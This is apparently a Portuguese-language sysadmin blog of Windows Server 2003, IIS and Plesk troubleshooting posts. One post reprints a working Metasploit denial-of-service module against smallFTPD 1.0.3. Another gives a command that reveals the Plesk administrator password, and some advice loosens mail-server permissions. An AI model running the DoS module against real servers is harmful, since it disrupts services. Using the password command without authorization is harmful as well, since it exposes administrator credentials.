Instalação do Windows XP ou server 2003 parando em 34 minutos

Standard

Pode parecer curioso, mas se o seu windows XP ou windows server 2003 estiver parando em 34 minutis (instalando dispositivos) vou lhe dizer o nome do “acusado ou acusados”, DISPOSITIVOS USB!

Coloque um teclado PS2 ao invés de um teclado USB, assim como mouse (desconecte impressoras e os demais usb) e corra para o abraço ;).

Como fazer tunning do Terminal Server na windows server 2003

Standard


Eliminate IE Flickering: Configure this setting to force off-screen composition of Internet Explorer, which eliminates the flickering effect. In HKEY_ CURRENT_USER\Software\Microsoft\Internet Explorer\Main, set the DWORD value for Force Offscreen Composition to 1.

Disable Office 2003 Customer Experience Improvement Program: Configure this setting to prevent Office from prompting the user to participate in this program. To enable, in HKEY_ CURRENT_USER\Software\Microsoft\Office\Common, set the DWORD value for QMEnable to 1.
Disable File Locking: Configure this setting to modify the file locking behavior on the server. This will enhance performance, but it's known to have issues with some database applications. To enable, in HKEY_LOCAL_ MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters, set the DWORD value for UseLockReadUnlock to 1.

Disable NTFS Last-Accessed Time Stamping: Configure this setting to prevent the system from updating the last accessed time stamp on files, which can enhance performance. Some applications require this to be accurate, so test prior to implementing. To enable, in HKEY_LOCAL_ MACHINE\System\CurrentCon trolSet\Control\FileSystem, set the DWORD value for NtfsDisable LastAccessUpdate to 1.
Turn off Lazy Writes: This setting prevents the system from caching write operations before writing them to disk. This can speed operation over the network. Configure the following two keys: In HKEY_LOCAL_MACHINE\ System\CurrentControlSet\Services\ LanmanServer\Parameters, set the DWORD value for IRPStackSize to 15. Also, in HKEY_LOCAL_MACHINE\ System\CurrentControlSet\Services\ LanmanWorkstation\Parameters, set the DWORD value for UtilizeNT Caching to 0.

Improve Windows Kernel Performance: Prevents the system from paging kernel mode drivers and system code to disk, which can decrease performance. To configure: In HKEY_LOCAL_ MACHINE\System\CurrentCon trolSet\Control\Session Manager\ Memory Management, set the DWORD value for DisablePagingExecutive to 1.

Increase the Network Request Buffer: This setting boosts performance by increasing the size of the network request buffer, which determines how much data is stored before it is sent to the client. This setting can also improve LAN Manager file writing performance. Increasing the size of this buffer will consume RAM, so adjust and monitor carefully. To enable, in HKEY_ LOCAL_MACHINE\System\Current ControlSet\Services\LanmanServer\Parameters, increase the DWORD value for SizReqBuf to a value between 1024 and 65535.

Eliminate Session Hangs During Logoff: Terminal Server sessions can sometimes hang when the user attempts to log off. One solution: Modify available network buffers and open connections. Configure the following keys: In HKEY_LOCAL_MACHINE\ System\CurrentControlSet\Services\ LanmanServer\Parameters, set the DWORD value for MaxWorkItems to 8196, MaxMpxCt to 2048, MaxRaw WorkItems to 512, MaxFreeConnections to 100, and MinFreeConnections to 32. In KEY_LOCAL_MACHINE\ System\CurrentControlSet\ Services\LanmanServer\Parameters, set the DWORD value for MaxCmds to 2048. Also, in HKEY_LOCAL_ MACHINE\System\Current ControlSet\Control\SessionManager\ ConfigurationManager, set the value for RegistryLazyFlushInterval to 60. Lastly, ensure that the Enable Advanced Performance feature is enabled when viewing device properties of all disk drives on the system.

Speed up Application Load Times: Increase the perceived performance of your Terminal Server by pre-loading commonly used files into memory. This works well on systems with plenty of available RAM. To enable, in HKEY_ LOCAL_MACHINE\System\ CurrentControlSet\Control\Session Manager\Memory Management\ PrefetchParameters, set the DWORD value for EnablePrefetcher to 3.

Disable Caching of Roaming Profiles: Excess roaming profiles on a Terminal Server can consume disk and Registry quota space. Configuring this setting can eliminate waste but increase user's login time. To enable, in HKEY_ LOCAL_MACHINE\Software\ Microsoft\Windows NT\Current Version\Winlogon, set the DWORD value for DeleteRoamingCache to 1.

Disable Unused Subsystems: Not using the POSIX subsystem on your Terminal Server? Disable it and navigate to the registry location HKEY_LOCAL_ MACHINE\System\CurrentCon trolSet\Control\Session Manager\ Subsystems and delete the Posix key. Disable the File Indexing Service: File Indexing Service is great for quickly searching for files, but your Terminal Server arguably shouldn't have that many user files on it and the indexing process can consume huge system resources. To disable it, navigate to the properties menu of each drive on your system and deselect the box for Allow Indexing Service to index this disk for fast file searching.

O registro do windows deve assemelhar-se com:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\
Main]
"Force Offscreen Composition"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\Common]
"QMEnable"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
LanmanWorkstation\Parameters]
"UseLockReadUnlock"=dword:00000001

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\
FileSystem]
"NtfsDisableLastAccessUpdate"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
Lanman Server\Parameters]
"IRPStackSize"=dword:0000000f
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Service\
Lanman WorkStation\Parameters]
"UtilizeNTCaching"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Session Manager\Memory Management]
"DisablePagingExecutive"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
LanmanServer\Parameters]
"SizReqBuf"=dword:0000ffff

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
Lanmanserver\Parameters]
"MaxWorkItems"=dword:00002004
"MaxMpxCt"=dword:00000800
"MaxRawWorkItems"=dword:00000200
"MaxFreeConnections"=dword:00000064
"MinFreeConnections"=dword:00000020
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
Lanmanworkstation\Parameters]
"MaxCmds"=dword:00000800
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\
Session Manager\Configuration Manager]
"RegistryLazyFlushInterval"=dword:0000003c

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
SessionManager\Memory Management\PrefetchParameters]
"EnablePrefetcher"="3"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Winlogon]
"DeleteRoamingCache"=dword:00000001

http://redmondmag.com/articles/2006/06/01/speed-up-terminal-server.aspx

Smallftpd 1.0.3 FTP Server Denial of Service Vulnerability

Standard

Exploit para dos no SmallFTPD:

# Exploit Title: smallFTPD Connection Saturation Remote Denial of Service

# Date: June 27, 2011
# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>
# Software Link: http://smallftpd.sf.net
# Version: 1.0.3-fix and earlier
# Tested on: windows xp, seven, 2k3
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'smallFTPD Connection Saturation Remote Denial of Service',
'Description' => %q{
This module triggers unauthenticated Denial-of-Service condition in SmallFTPD server versions 1.0.3-fix and earlier with a few dozens of connection requests. The vulnerability is probably conerned with smallftpd being unable to handle multiple connections regardless of its maximum connection settings. Upon successful DoS exploit, the smallftpd will crash or still seem functioning by showing its service banner. But in fact it stops denying new FTP requests, which can be verified only through a valid login.
},
'Author' => [ 'Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision:  $',
'References' =>
[
[ 'URL', 'http://core.yehg.net/lab/pr0js/advisories/smallftpd_103-fix_saturation_dos' ]
],
'DisclosureDate' => 'June 2010'))
register_options(
[
Opt::RPORT(21)
],self.class)
end
def run
print_status("Sending DOS Packets ...")
35.times do |x|
connect
sock.put("USER CRASHEDrn")
disconnect
end
print_good("Done")
end

end

 

Fonte: http://www.exploit-db.com/exploits/17455/

Cdonts erro 500 quando tento enviar email com ASP classic

Standard

NADA de pânico, reveja antes 2 coisas:

1 – se no log de erros do site aparece 800a0046|Permission_denied no momento do uso do CDONTS,
2 – Reveja todos os passos abaixo (Parallels):

[How-To] Installing CDONTS on Windows 2003 Server
Article ID: 560
Last Review: Sep, 23 2010

Popularity:

APPLIES TO:

* Plesk 8.x for Windows
* Plesk 7.x for Windows
* Plesk 9.x for Windows

Resolution

Microsoft Windows Server 2003 does not install Collaboration Data Objects (CDO) for NTS (CDONTS). Therefore, applications using CDONTS do not work on Windows Server 2003-based computers. Windows Server 2003 provides improved alternatives to CDONTS.

For CDONTS to work in a Windows Server 2003-based computers, please do the following:

1. Download the attached CDONTS.ZIP file (you can also get CDONTS.DLL from the installation CD of your Windows 2000). Once downloaded, unzip CDONTS.DLL and put it in

For 32-bit systems:
%systemroot%\system32 folder (by default C:\Windows\system32).

For 64-bit systems:
%windir%\syswow64 (by default C:\Windows\syswow64).

2. Register the CDONTS.DLL component in the server using the following command:

For 32-bit systems:

regsvr32 “%systemroot%\system32\cdonts.dll”

For example:

C:\WINDOWS\system32>regsvr32.exe cdonts.dll

For 64-bit systems:

regsvr32 “%systemroot%\syswow64\cdonts.dll”

For example:

C:\WINDOWS\syswow64>regsvr32.exe cdonts.dll

3. Once the CDONTS.DLL component is registered, you should check if your SMTP service is running.

Go to Administrative tools, IIS and Expand your local machine. If the SMTP service is listed, it means it is already installed, if not you should install this service.

To install SMTP, do the following:

Go to Control Panel, Add/Remove Programs, Add/Remove Windows Components, Application Server, IIS, Select SMTP service, Click OK.

4. Change the port number for the SMTP service. The default port is 25. Use 25 only when no other SMTP service is running. If there is already another SMTP service running on the server, change the SMTP port of IIS, for example to port 8025.

You can make this through IIS management console: Control Panel, IIS, expand `local computer`, SMTP, Properties, General, click Advanced button, Edit.

5. Set up SMTP service. Most important is setting up a fully qualified domain name for the SMTP service: Control Panel, IIS, expand `local computer`, SMTP, Properties, Delivery, click Advanced button and set up Security service for SMTP.

It is required to give permissions to IIS_WPG standard IIS Worker Process Group. Control Panel, IIS , expand `local computer`, SMTP, Properties, Security, click Add button, then click Object types button…, select Groups element, click OK, enter IIS_WPG as object name to add and click OK.

Additional configuration: Select Authentication and check Anonymous Access and Integrated Windows Authentication. Click OK and then click CONNECTION. Set up the RELAY settings. Click DELIVERY tab and then click ADVANCED. Set up the MAX Count hop to the required value, even though we suggest setting it to at least 20.

Now the SMTP service of IIS is already configured.
Additional information
For additional information, please, refer to

http://support.microsoft.com/default.aspx?scid=kb;en-us;324649
Attachments:

* cdonts.zip(172Kb)

—————————–

Depois de seguir os passos assim, caso você perceba que ainda assim não funciona normal o Cdonts faça algo mais interessante, abra o C:\Inetpub\Mailroot
Nesta pasta dê permissão para IUSR_NOMEDOPC (se o pc fosse nerdblog [hostname] seria iusr_nerdblog).
A permissão deve ser completa para ele.
Depois disso reinicie o IIS e prepare a caixa de BIS para minha casa.

😛

Service Unavailable HTTP Error 503 – Coisas que só o IIS pode “proporcionar” a você

Standard

Das coisas que mais me irritam a mais especial é a falta de logs precisos por parte do sistema operacional. Em se tratando de Microsoft aí é que a coisa pega e pega FEIO!

Um dos erros que me fizeram gastar aproximadamente 8 horas de troubleshooting foi o erro Service Unavailable HTTP Error 503. Das coisas que mais se alegam são:

– Chaves pré-definidas junto aos serviços do IIS:
http://blogs.iis.net/webtopics/archive/2010/02/17/a-not-so-common-root-cause-for-503-service-unavailable.aspx
e
http://blogs.msdn.com/b/drnick/archive/2006/10/16/configuring-http-for-windows-vista.aspx

– Contas sem autoridade junto ao IIS:
http://social.msdn.microsoft.com/Forums/en/mdmsetup/thread/4689da4a-0452-45b6-bbb4-21ccb76d8ff9

– IIS operando com recursos de 32 bits em plataformas 64 bits:
http://forums.asp.net/p/1502755/3560390.aspx

– IIS com “loucuras” que só Deus para não duvidar:
http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/55f71614-ef1b-4015-b9c8-a42c1e700c25.mspx?mfr=true

– Falaram que pode ser algum sysadmin modificando algo, por isso o downtime:
http://www.checkupdown.com/status/E503_pt.html
http://technet.microsoft.com/pt-br/library/cc736325%28WS.10%29.aspx

Caso você tenha “passado” pelos pontos acima e nenhum deles “sanou” seu problema, e além disso, você tem CERTEZA de que sua appweb está 100% depurada, debug 100% ok, tudo filé, e ainda tem CERTEZA que nenhum admin andou fazendo besteira em seu servidor, a saída pode ser alcançada da seguinte forma:

1 – Observe se existe alguma tabela corrompida em suas consultas SQL na appweb (caso consiga – detalhe, foi meu caso com BDs do tipo Mysql).
2 – Permissões em arquivos remotos ou tempo de resposta a tais chamadas.

Perceba que não é erro em nada de configuração, servidor e etc (evite loucuras como as minhas de tuning, pensando que era um erro de alto processamento, i/o e etc).

Normalmente os logs ineficientes (ex: 503 “n/a” nome do POOL_com_paranente_problema) do IIS falam que o pool de aplicativos “XXX” (nome que você deu ao pool) para rodar aplicativos DOTNET expirou/expulso/estuprou/estrangulou e etc a requisição (quer seja por POST ou GET). (na pasta logfiles dentro de windows – aonde o iis guarda seus logs)
O mais top dos erros:

1. “Connection_Dropped DefaultAppPool”
2. “Connection_Abandoned_By_AppPool DefaultAppPool”

Mesmo que você venha utilizar-se do software de debug que a MS tem, sinto muito em lhe avisar, mas será em vão utilizar-se tal ferramenta!
Siga os meus conselhos nas linhas em negrito, aquilo ali pode salvar seu dia. Use um frontend para executar suas querys e ver se não estão ali as saídas.

Ferramenta: http://support.microsoft.com/kb/919792/

path ou caminho das estatísticas de domínios no plesk

Standard

Muitas vezes precisamos de estatísticas (LOGS DO DOMÍNIO) para analizar algum erro em um servidor e nos deparamos comum certo dilema:

O plesk não é como “as coisas naturais do iis são”… lol
É isto mesmo, os logs que mostram erros críticos em um site não ficam localizados em:
C:\Windows\System32\LogFiles\W3SVCXXXXX (aonde XXXXX são números).

Caso queira achar uma informação proveitosa de um domínio a saída está aqui:

C:\INETPUB\VHOSTS\SITEASERANALIZADO.COM.BR\STATISTICS\LOGS\W3SVCXXXXX (XXXXX = números)

Se achar a resolução do problema, pls, dê um whois no meu domínio, ache minha casa e me mande uma caixa de BIS, please!

Como saber a senha do administrador do Plesk em um windows server 2003 ou 2008 (webedition, enterprise, standard, datacenter)

Standard

Para saber a senha do administrador do Plesk em um windows server 2003 ou 2008 (webedition, enterprise, standard, datacenter) basta rodar o seguinte comando:

C:\””PASTA DE PROGRAMAS””\SWsoft\Plesk\admin\bin\plesksrvclient.exe” -get (no 2003)
“C:\””PASTA DE PROGRAMAS”\Parallels\Plesk\admin\bin\plesksrvclient.exe” -get (no 2008).
Abraços.

internal server error windows plesk 9 ou 8

Standard

Caso tenha 1 site em asp e o mesmo está apresentando esse erro, please, não entre em pânico, uma das coisas que pode estar ocasionando isto é o fato do parent path estar desabilitado (sua app ou de seu cliente recém chegado usa recursividade assim ../), para sanar isto faça o seguinte (dentro do domínio do seu cliente – já dentro do plesk como admin):

3 -> Clique em File e escolhe web directories (isso no 9, no 8 já tem web directories).

4 -> Assim que for aberto procure por Directory Properties, clique nele.

Procure a opção que ordena a liberação do parent path e marque-a.


Depois disso tente acessar novamente 😉


Plesk 8 e Plesk 9 Como modificar páginas de erros personalizadas how to change customized error pages on plesk

Standard

No meu blog littleoak eu fiz um how para isto:

http://littleoak.wordpress.com/2009/03/24/plesk-8-e-plesk-9-como-modificar-paginas-de-erros-personalizadas-how-to-change-customized-error-pages-on-plesk/

Ativando register globals no Plesk 8 ou Plesk 9 How to enable register globals or safe mode on plesk

Standard

Criei no littleoak um tutorial para isto.

http://littleoak.wordpress.com/2009/03/24/ativando-register-globals-no-plesk-8-ou-plesk-9-how-to-enable-register-globals-safe-mode-on-plesk/

A dynamic link library (DLL) initialization routine failed FTP

Standard

Se você recebeu esta mensagem quando estava tentando reiniciar seu FTP (iis) -> A dynamic link library (DLL) initialization routine failed FTP – siga a dica abaixo:

entre no servidor, abra o MS-DOS (iniciar-> executar -> cmd) e digite:

cd c:\inetpub\adminscripts\

Entrando ali ajuste as portas passivas para uso do FTP (lembrar que tais portas só operam acima de 5500, por isso do erro):

adsutil.vbs get msftpsvc/Passiveportrange “5500-5800”

Após reinicie seu iis e seja feliz!

Wildcard DNS no Windows Server 2000/2003 Plesk

Standard

Vamos entrar com a zona DNS no Windows Server 2003:

1.

Clique em “Start”, Clique em “Control Panel”, Clique em “Administrative Tools”, e depois Clique em DNS.
2.

No menu “Action”, Clique em “Connect to DNS Server”.
3.

Em “Connect to DNS Server”, Clique no próximo computador.
4.

Entre com uma entrada WildCard no computador:*.seudomínio.com.br.
5.

Selecione o “Connect to the specified computer” marcando a checkbox, e clique em Ok.

No 2000 server use:

1.

Na ferramenta de administração de DNS crie um domínio “filho” em seudomínio.com.br do tipo “*”.
2.

No domínio filho “*” crie uma entrada com o nome vazio, porém com o ip principal do site, algo com 192.168.100.100 (coloque o ip do site). Você deverá ignorar a mensagem de erro pela entrada de nome vazia.

Hello world!

Standard

Esse termo Hello World é interessante, por que se observarmos o cidadão torna-se bem vindo ao mundo… rsrsrs, sem graça não é? Sim, mas faz sentido aqui em 2 situações:

Hello Nerd World and Hello Program World.

Seja bem vindo ao nosso site de How Tos e “contos de TI”.
Divirta-se ou aprenda algo interessante.

Prometemos How tos sobre Redes, PHP, Mysql, Postgres, Windows, BSD e Gnu/Linux, sem contar notícias sobre Apple, Sun, IBM e outros “monstrinhos” do mercado de TI, como Red Hat e a “pequenina” GOOGLE.

Obrigado por nos prestigiar.